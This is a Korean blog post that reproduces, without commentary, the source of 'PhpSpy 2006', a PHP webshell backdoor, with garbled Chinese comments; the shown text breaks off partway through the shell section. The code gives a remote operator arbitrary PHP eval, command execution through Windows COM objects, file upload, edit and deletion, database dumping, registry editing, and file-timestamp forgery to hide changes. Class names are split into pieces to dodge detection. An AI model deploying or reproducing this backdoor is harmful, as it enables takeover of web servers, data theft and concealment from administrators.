나의 공간과 이야기

php에서 사용되는 백도어 소스 전체

Historymaker731 2015. 6. 4. 17:10

 

기록일자

 

2008.07.23 14:28

 

2007년 버전입니다.
현재는 2008 버전까지 출시되었습니다.


<?php
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 넋埼토零 =====================*/
// 角뤠矜狼쵱쯤駱聯,1槨矜狼駱聯,페儉鑒俚槨殮쌈쏵흙.苟충朞淃橙轟槻
$admin['check'] = "1";
// 흔벎矜狼쵱쯤駱聯,헝錦맣되쩍쵱쯤
$admin['pass']  = "123456";
// 角뤠豚冀phpspy굶菱땡錦맣긍서빈匡숭돨珂쇌槨쉔접珂쇌(yes/no)
$retime = "no";
// 칵훰cmd.exe돨貫零,proc_open변鑒狼賈痰돨,linux溝固헝뚤壇錦맣.(솝角winnt溝固瞳넋埼쟁弩횔옵鹿寧땍)
$cmd = "cmd.exe";
// 苟충角phpspy鞫刻경홈컸으돨,凜槨굳붤뜩넋埼뎠냥鱗槨밑숩늦죄,戴벽~~豚冀菱땍屢걸。뻘角꼇땠깎맣~~
$notice = "[<a href=\"#\" title=\"풍융돨륑戴\">Saiy</a>]  [<a href=\"http://www.4gnel.net\" title=\"갛홍莖賈\">S4T</a>]  [<a href=\"http://1v1.name\" title=\"7jdg\">7jdg</a>]<br><FONT color=#ff3300>츠:헝蕎賈痰굶넋埼닒慤렷랬契槨,뤠橙빈벎菱맏!</font>";
/*===================== 토零써監 =====================*/
// 豚冀넋埼瞳 register_globals = off 돨뻔쓱苟묏鱗
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");


/*===================== 룀駱聯 =====================*/
if($admin['check'] == "1") {
    if ($_GET['action'] == "logout") {
        setcookie ("adminpass", "");
        echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
        echo "<span style=\"font-size: 12px; font-family: Verdana\">鬧饋냥묘......<p><a href=\"".$self."\">힛취빈菱땡藁놔샀데샌侶쟁藁놔넋埼썹충 >>></a></span>";
        exit;
    }

    if ($_POST['do'] == 'login') {
        $thepass=trim($_POST['adminpass']);
        if ($admin['pass'] == $thepass) {
            setcookie ("adminpass",$thepass,time()+(1*24*3600));
            echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
            echo "<span style=\"font-size: 12px; font-family: Verdana\">되쩍냥묘......<p><a href=\"".$self."\">힛취빈菱땡契瘻샀데샌侶쟁쏵흙넋埼썹충 >>></a></span>";
            exit;
        }
    }
    if (isset($_COOKIE['adminpass'])) {
        if ($_COOKIE['adminpass'] != $admin['pass']) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/*===================== 駱聯써監 =====================*/

// 털뙤 magic_quotes_gpc 榴檄
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}

// 꿴였PHPINFO
if ($_GET['action'] == "phpinfo") {
    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 변鑒綠굳쐐痰,헝꿴였<PHP뻔쓱긴좆>";
    exit;
}
if($_GET['action'] == "nowuser") {
$user = get_current_user();
if(!$user) $user = "괩멩낀바,寮샙긴檄,轟랬삿혤뎠품쏵契痰빵츰!";
echo"뎠품쏵넋痰빵츰:$user";
exit;
}
if(isset($_POST['phpcode'])){
    eval("?".">$_POST[phpcode]<?");
    exit;
}
// 瞳窟덜잿
if (isset($_POST['url'])) {
    $proxycontents = @file_get_contents($_POST['url']);
    echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>삿혤 URL 코휭呵겨</b></p></center></body>";
    exit;
}

// 苟潼匡숭
if (!empty($downfile)) {
    if (!@file_exists($downfile)) {
        echo "<script>alert('콱狼苟돨匡숭꼇닸瞳!')</script>";
    } else {
        $filename = basename($downfile);
        $filename_info = explode('.', $filename);
        $fileext = $filename_info[count($filename_info)-1];
        header('Content-type: application/x-'.$fileext);
        header('Content-Disposition: attachment; filename='.$filename);
        header('Content-Description: PHP Generated Data');
        header('Content-Length: '.filesize($downfile));
        @readfile($downfile);
        exit;
    }
}

// 殮쌈苟潼구룀鑒앴욋
if ($_POST['backuptype'] == 'download') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("鑒앴욋젯쌈呵겨");
    @mysql_select_db($dbname) or die("朞嶝鑒앴욋呵겨");    
    $table = array_flip($_POST['table']);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "놔댄: ".mysql_error();

    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            $mysqldata.= $mysqldata."\r\n";
        }
    }
    mysql_close();
    exit;
}

// 넋埼커쩌
$pathname=str_replace('\\','/',dirname(__FILE__));

// 삿혤뎠품쨌쓺
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET['dir'];
    $nowpath = getPath($pathname, $dir);
}

// 털뙤뗍畇헙워
$dir_writeable = (dir_writeable($nowpath)) ? "옵畇" : "꼇옵畇";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">鬧꿍깊꾸鱗</a>" : "";

$tb = new FORMS;

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>http://<? echo $_SERVER['HTTP_HOST'];?>  PhpSpy 2006 錦맣경</title>
<style type="text/css">
body{
    BACKGROUND-COLOR: #F5F5F5;
    COLOR: #3F3849;
    font-family: "Verdana", "Tahoma", "芥竟";
    font-size: "12px";
    line-height: "140%";
}

TD        {FONT-FAMILY: "Verdana", "Tahoma", "芥竟"; FONT-SIZE: 12px; line-height: 140%;}
.smlfont {
    font-family: "Verdana", "Tahoma", "芥竟";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {
    COLOR: "#CA0000";
}
A:LINK        {COLOR: #3F3849; TEXT-DECORATION: none}
A:VISITED    {COLOR: #3F3849; TEXT-DECORATION: none}
A:HOVER        {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc}
A:ACTIVE    {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
    for (var i=0;i<form.elements.length;i++) {
        var e = form.elements[i];
        if (e.name != 'chkall')
        e.checked = form.chkall.checked;
    }
}
function really(d,f,m,t) {
    if (confirm(m)) {
        if (t == 1) {
            window.Location.href='?dir='+d+'&deldir='+f;
        } else {
            window.Location.href='?dir='+d+'&delfile='+f;
        }
    }
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$test = "";
if(!$_GET['dir']) $dir = "./";
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y쾨m墩d휑 h:i:s",time()).'</td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('| <a href="?action=logout">鬧饋되쩌</a> | <a href="?action=dir">Shell 커쩌</a> | <a href="?action=phpenv">뻔쓱긴좆</a> | <a href="?action=proxy">瞳窟덜잿</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | ');
$tb->tdbody('| <a href="?action=downloads">Http 匡숭苟潼</a> | <a href="?action=search&dir='.$dir.'">匡숭꿴冷</a> | <a href="?action=eval">獵契php신굶</a> | <a href="?action=sql">獵契SQL刀얌</a> | <a href="?action=sql&type=fun">Func럽뎐Shell</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="?action=SUExp">Serv-U EXP</a> |');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>넋埼쨌쓺: '.$pathname.'<br>뎠품커쩌('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>契瘻커쩌: '.$tb->makeinput('dir').' '.$tb->makeinput('','횅땍','','submit').' 【連넣없뚤쨌쓺뵨宮뚤쨌쓺】'));

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'눈匡숭돕뎠품커쩌: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','횅땍','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'劤쉔匡숭瞳뎠품커쩌: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','횅땍','','submit')));

$tb->headerform(array('content'=>'劤쉔커쩌瞳뎠품커쩌: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','횅땍','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 獵契꾸鱗 역迦 =====================*/
echo "<p><b>\n";
// 뇜匡숭
if (!empty($delfile)) {
    if (file_exists($delfile)) {
        echo (@unlink($delfile)) ? $delfile." 뇜냥묘!" : "匡숭뇜呵겨!";
    } else {
        echo basename($delfile)." 匡숭綠꼇닸瞳!";
    }
}

// 뇜커쩌
elseif (!empty($deldir)) {
    $deldirs="$dir/$deldir";
    if (!file_exists("$deldirs")) {
        echo "$deldir 커쩌綠꼇닸瞳!";
    } else {
        echo (deltree($deldirs)) ? "커쩌뇜냥묘!" : "커쩌뇜呵겨!";
    }
}
// 눼쉔커쩌
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
    if (!empty($newdirectory)) {
        $mkdirs="$dir/$newdirectory";
        if (file_exists("$mkdirs")) {
            echo "맡커쩌綠닸瞳!";
        } else {
            echo (@mkdir("$mkdirs",0777)) ? "눼쉔커쩌냥묘!" : "눼쉔呵겨!";
            @chmod("$mkdirs",0777);
        }
    }
}

// 눈匡숭
elseif ($doupfile) {
    echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "눈냥묘!" : "눈呵겨!";
}

// 긍서匡숭
elseif ($_POST['do'] == 'doeditfile') {
    if (!empty($_POST['editfilename'])) {
    if(!file_exists($editfilename)) unset($retime);
    if($time==$now) $time = @filemtime($editfilename);
        $time2 = @date("Y-m-d H:i:s",$time);
        $filename="$editfilename";
        @$fp=fopen("$filename","w");
        if($_POST['change']=="yes"){
        $filecontent = "?".">".$_POST['filecontent']."<?";
        $filecontent = gzdeflate($filecontent);
        $filecontent = base64_encode($filecontent);
        $filecontent = "<?php\n/*\n덜쯤譚풍융돨륑戴속쵱!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
        }else{
        $filecontent = $_POST['filecontent'];
        }
        echo $msg=@fwrite($fp,$filecontent) ? "畇흙匡숭냥묘!" : "畇흙呵겨!";
        @fclose($fp);
        if($retime=="yes"){
        echo" 戴戴菱땡꾸鱗:";
        echo $msg=@touch($filename,$time) ? "錦맣匡숭槨".$time2."냥묘!" : "錦맣匡숭珂쇌呵겨!";
        }
    } else {
        echo "헝渴흙拳狼긍서돨匡숭츰!";
    }
}
//匡숭苟潼
elseif ($_POST['do'] == 'downloads') {
    $contents = @file_get_contents($_POST['durl']);
    if(!$contents){
    echo"轟랬뗍혤狼苟潼돨鑒앴";
    }
    elseif(file_exists($path)){
    echo"붤괠퓔,匡숭".$path."綠쒔닸瞳죄,헝뫘뻣괏닸匡숭츰。";
    }else{
    $fp = @fopen($path,"w");
    echo $msg=@fwrite($fp,$contents) ? "苟潼匡숭냥묘!" : "苟潼匡숭畇흙珂呵겨!";
    @fclose($fp);
    }
}

// 긍서匡숭橄昑
elseif ($_POST['do'] == 'editfileperm') {
    if (!empty($_POST['fileperm'])) {
        $fileperm=base_convert($_POST['fileperm'],8,10);
        echo (@chmod($dir."/".$file,$fileperm)) ? "橄昑錦맣냥묘!" : "錦맣呵겨!";
        echo " 匡숭 ".$file." 錦맣빈돨橄昑槨: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
    } else {
        echo "헝渴흙拳狼零돨橄昑!";
    }
}

// 匡숭맣츰
elseif ($_POST['do'] == 'rename') {
    if (!empty($_POST['newname'])) {
        $newname=$_POST['dir']."/".$_POST['newname'];
        if (@file_exists($newname)) {
            echo "".$_POST['newname']." 綠쒔닸瞳,헝路劤渴흙寧몸!";
        } else {
            echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 냥묘맣츰槨 ".$_POST['newname']." !" : "匡숭츰錦맣呵겨!";
        }
    } else {
        echo "헝渴흙拳狼맣돨匡숭츰!";
    }
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"<span class=\"redfont\">꿴冷밑숩늦:[".$oldkey."],苟충鞫刻꿴冷돨써벎:";
    if($type2 == "getpath"){
    echo"柑깃盧돕써벎匡숭삔唐꼬롸쌔혤鞫刻.";
}
echo"</span><br><hr width=\"775\" noshade>";
find($path);
}else{
echo"콱狼꿴瞿쵠?돕뒀狼꿴瞿쵠켱?唐청唐瞿쵠狼콱꿴켱?";
}
}

// 옹징珂쇌
elseif ($_POST['do'] == 'domodtime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "狼錦맣돨匡숭꼇닸瞳!";
    } else {
        if (!@file_exists($_POST['tarfile'])) {
            echo "狼꽝亮돨匡숭꼇닸瞳!";
        } else {
            $time=@filemtime($_POST['tarfile']);
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 돨錦맣珂쇌냥묘맣槨 ".date("Y-m-d H:i:s",$time)." !" : "匡숭돨錦맣珂쇌錦맣呵겨!";
        }
    }
}

// 菱땍屢珂쇌
elseif ($_POST['do'] == 'modmytime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "狼錦맣돨匡숭꼇닸瞳!";
    } else {
        $year=$_POST['year'];
        $month=$_POST['month'];
        $data=$_POST['data'];        
        $hour=$_POST['hour'];
        $minute=$_POST['minute'];
        $second=$_POST['second'];
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
            $time=strtotime("$data $month $year $hour:$minute:$second");
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 돨錦맣珂쇌냥묘맣槨 ".date("Y-m-d H:i:s",$time)." !" : "匡숭돨錦맣珂쇌錦맣呵겨!";
        }
    }
}

// 젯쌈MYSQL
elseif ($connect) {
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
        echo "鑒앴욋젯쌈냥묘!";
        mysql_close();
    } else {
        echo mysql_error();
    }
}

// 獵契SQL刀얌
elseif ($_POST['do'] == 'query') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("鑒앴욋젯쌈呵겨");
    @mysql_select_db($dbname) or die("朞嶝鑒앴욋呵겨");
    $result = @mysql_query($_POST['sql_query']);
    echo ($result) ? "SQL刀얌냥묘獵契!" : "놔댄: ".mysql_error();
    mysql_close();
}

// 구룀꾸鱗
elseif ($_POST['do'] == 'backupmysql') {
    if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
        echo "헝朞嶝挑구룀돨鑒앴깊뵨구룀렘駕!";
    } else {
        if ($_POST['backuptype'] == 'server') {
            @mysql_connect($servername,$dbusername,$dbpassword) or die("鑒앴욋젯쌈呵겨");
            @mysql_select_db($dbname) or die("朞嶝鑒앴욋呵겨");    
            $table = array_flip($_POST['table']);
            $filehandle = @fopen($path,"w");
            if ($filehandle) {
                $result = mysql_query("SHOW tables");
                echo ($result) ? NULL : "놔댄: ".mysql_error();
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $filehandle);
                        fwrite($filehandle,"\n\n\n");
                    }
                }
                fclose($filehandle);
                echo "鑒앴욋綠냥묘구룀돕 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
                mysql_close();
            } else {
                echo "구룀呵겨,헝횅훰커깃匡숭셸角뤠야唐옵畇홈掘!";
            }
        }
    }
}

// 댔관苟潼 PS:匡숭格댕옵콘렷끽찹
// Thx : 鬼빻
elseif($downrar) {
    if (!empty($dl)) {
        $dfiles="";
        foreach ($dl AS $filepath=>$value) {
            $dfiles.=$filepath.",";
        }
        $dfiles=substr($dfiles,0,strlen($dfiles)-1);
        $dl=explode(",",$dfiles);
        $zip=new PHPZip($dl);
        $code=$zip->out;        
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
        echo $code;
        exit;
    } else {
        echo "헝朞嶝狼댔관苟潼돨匡숭!";
    }
}

// Shell.Application 頓契넋埼
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
    $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
    echo ($a=='0') ? "넋埼綠쒔냥묘獵契!" : "넋埼頓契呵겨!";
}

// 꿴였PHP토零꽝鑒榴워
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
    echo "토零꽝鑒 ".$_POST['phpvarname']." 쇱꿎써벎: ".getphpcfg($_POST['phpvarname'])."";
}

// 뗍혤鬧꿍깊
elseif(($regread) AND !empty($_POST['readregname'])) {
    $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
    var_dump(@$shell->RegRead($_POST['readregname']));
}

// 畇흙鬧꿍깊
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
    $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
    $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
    echo ($a=='0') ? "畇흙鬧꿍깊숯令냥묘!" : "畇흙 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 呵겨!";
}

// 뇜鬧꿍깊
elseif(($regdelete) AND !empty($_POST['delregname'])) {
    $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
    $a = @$shell->RegDelete($_POST['delregname']);
    echo ($a=='0') ? "뇜鬧꿍깊숯令냥묘!" : "뇜 ".$_POST['delregname']." 呵겨!";
}

else {
    echo "$notice";
}

echo "</b></p>\n";
/*===================== 獵契꾸鱗 써監 =====================*/

if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
    $tb->tableheader();
?>
  <tr bgcolor="#cccccc">
    <td align="center" nowrap width="27%"><b>匡숭</b></td>
    <td align="center" nowrap width="16%"><b>눼쉔휑퍅</b></td>
    <td align="center" nowrap width="16%"><b>離빈錦맣</b></td>
    <td align="center" nowrap width="11%"><b>댕鬼</b></td>
    <td align="center" nowrap width="6%"><b>橄昑</b></td>
    <td align="center" nowrap width="24%"><b>꾸鱗</b></td>
  </tr>
<?php
// 커쩌죗깊
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="1"){
        if($file!=".." && $file!=".")    {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
            echo "<tr class=".getrowbg().">\n";
            echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\"><dir></td>\n";
            echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
            echo "  <td align=\"center\" nowrap>| <a href=\"#\" =\"really('".urlencode($dir)."','".urlencode($file)."','콱횅땍狼뇜 $file 커쩌찐? \\n\\n흔벎맡커쩌렷왕,늪늴꾸鱗쉥삔뇜맡커쩌苟돨杰唐匡숭!','1')\">뇜</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">맣츰</a> |</td>\n";
            echo "</tr>\n";
            $dir_i++;
        } else {
            if($file=="..") {
                echo "<tr class=".getrowbg().">\n";
                echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">럿쀼섬커쩌</a></td>\n";
                echo "</tr>\n";
            }
        }
    }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
  <td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 匡숭죗깊
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="0"){        
        $size=@filesize($filepath);
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        if (@filectime($filepath) == @filemtime($filepath)) {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
        } else {
            $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
            $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
        }
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
        echo "<tr class=".getrowbg().">\n";
        echo "  <td style=\"padding-left: 5px;\">";
        echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
        echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
        echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
        echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">苟潼</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">긍서</a> | <a href=\"#\" =\"really('".urlencode($dir)."','".urlencode($filepath)."','콱횅땍狼뇜 $file 匡숭찐?','2')\">뇜</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">맣츰</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">珂쇌</a></td>\n";
        echo "</tr>\n";
        $file_i++;
    }
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','朞櫓匡숭댔관苟潼','','submit').'</td><td align="right">'.$dir_i.' 몸커쩌 / '.$file_i.' 몸匡숭</td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>\n";
echo "</table>\n";
}// end dir

elseif ($_GET['action'] == "editfile") {
    if(empty($newfile)) {
        $filename="$dir/$editfile";
        $fp=@fopen($filename,"r");
        $contents=@fread($fp, filesize($filename));
        @fclose($fp);
        $contents=htmlspecialchars($contents);
    }else{
        $editfile=$newfile;
        $filename = "$dir/$editfile";
    }
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
    $tb->tableheader();
    $tb->formheader($action,'劤쉔/긍서匡숭');
    $tb->tdbody('뎠품匡숭: '.$tb->makeinput('editfilename',$filename).' 渴흙劤匡숭츰橙쉔접劤匡숭 Php덜쯤속쵱: <input type="checkbox" name="change" value="yes" ="javascript:alert(\'侶몸묘콘怜옵鹿痰윱속쵱샀角箕鍵供憐돨php덜쯤。\\n\\n렷php덜쯤샀꼇供憐php덜쯤샀꼇連넣gzinflate변鑒헝꼇狼賈痰!\')"> ');
    $tb->tdbody($tb->maketextarea('filecontent',$contents));
    $tb->makehidden('do','doeditfile');
    $tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
    $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
    $tb->tableheader();
    $tb->formheader($action,'錦맣匡숭츰');
    $tb->makehidden('oldname',$dir."/".$nowfile);
    $tb->makehidden('dir',$dir);
    $tb->tdbody('뎠품匡숭츰: '.basename($nowfile));
    $tb->tdbody('맣츰槨: '.$tb->makeinput('newname'));
    $tb->makehidden('do','rename');
    $tb->formfooter('1','30');
}//end rename

elseif ($_GET['action'] == "eval") {
    $action = "?dir=".urlencode($dir)."";
    $tb->tableheader();
    $tb->formheader(''.$action.' "target="_blank' ,'獵契php신굶');
    $tb->tdbody($tb->maketextarea('phpcode',$contents));
    $tb->formfooter('1','30');
    
}
elseif ($_GET['action'] == "fileperm") {
    $action = "?dir=".urlencode($dir)."&file=".$file;
    $tb->tableheader();
    $tb->formheader($action,'錦맣匡숭橄昑');
    $tb->tdbody('錦맣 '.$file.' 돨橄昑槨: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
    $tb->makehidden('file',$file);
    $tb->makehidden('dir',urlencode($dir));
    $tb->makehidden('do','editfileperm');
    $tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
    $action = "?dir=".urlencode($dir);
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
    $tb->tableheader();
    $tb->formheader($action,'옹징匡숭離빈錦맣珂쇌');
    $tb->tdbody("錦맣匡숭: ".$tb->makeinput('curfile',$file,'readonly')." ∪ 커깃匡숭: ".$tb->makeinput('tarfile','矜輕供憐쨌쓺섟匡숭츰'),'center','2','30');
    $tb->makehidden('do','domodtime');
    $tb->formfooter('','30');
    $tb->formheader($action,'菱땍屢匡숭離빈錦맣珂쇌');
    $tb->tdbody('<br><ul><li>唐槻돨珂쇌늑듕謹렀鍋角닒목주瓜撈珂쇌 1901 쾨 12 墩 13 휑 槿퍅巧 20:45:54 돕 2038쾨 1 墩 19 휑 槿퍅랗 03:14:07<br>(맡휑퍅몽앴 32 貫唐륜뵀憐鑒돨離鬼令뵨離댕令랍윱)</li><li>綱츠: 휑혤 01 돕 30 裂쇌, 珂혤 0 돕 24 裂쇌, 롸뵨취혤 0 돕 60 裂쇌!</li></ul>','left');
    $tb->tdbody('뎠품匡숭츰: '.$file);
    $tb->makehidden('curfile',$file);
    $tb->tdbody('錦맣槨: '.$tb->makeinput('year','1984','','text','4').' 쾨 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 墩 '.$tb->makeinput('data','18','','text','2').' 휑 '.$tb->makeinput('hour','20','','text','2').' 珂 '.$tb->makeinput('minute','00','','text','2').' 롸 '.$tb->makeinput('second','00','','text','2').' 취','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb->formfooter('1','30');
}//end newtime

elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=".urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
  if (substr(PHP_OS, 0, 3) == 'WIN') {
        $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
        echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
        $tb->tdbody('轟쀼鞫頓契넋埼 ∪ 匡숭: '.$tb->makeinput('program',$program).' 꽝鑒: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
        $tb->makehidden('do','programrun');
        echo "</form>\n";
    }
 echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
 if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb->tdbody('瓊刻:흔벎渴놔써벎꼇供홍,쉔累겉渴놔써벎畇흙匡숭.侶湳옵鹿돤돕홍꼬코휭. ');
    $tb->tdbody('proc_open변鑒솝꼇角칵훰돨winnt溝固헝菱契零賈痰,菱契錦맣션돤畇藁놔,뤠橙삔瞳寮샙즛苟寧몸灌써監돨쏵넋.');
    $tb->tdbody('proc_open변鑒狼賈痰돨cmd넋埼돨貫零:'.$tb->makeinput('cmd',$cmd,'','text','30').'(狼角角linux溝固뻘角댕댕쳬菱성錦맣걸)');
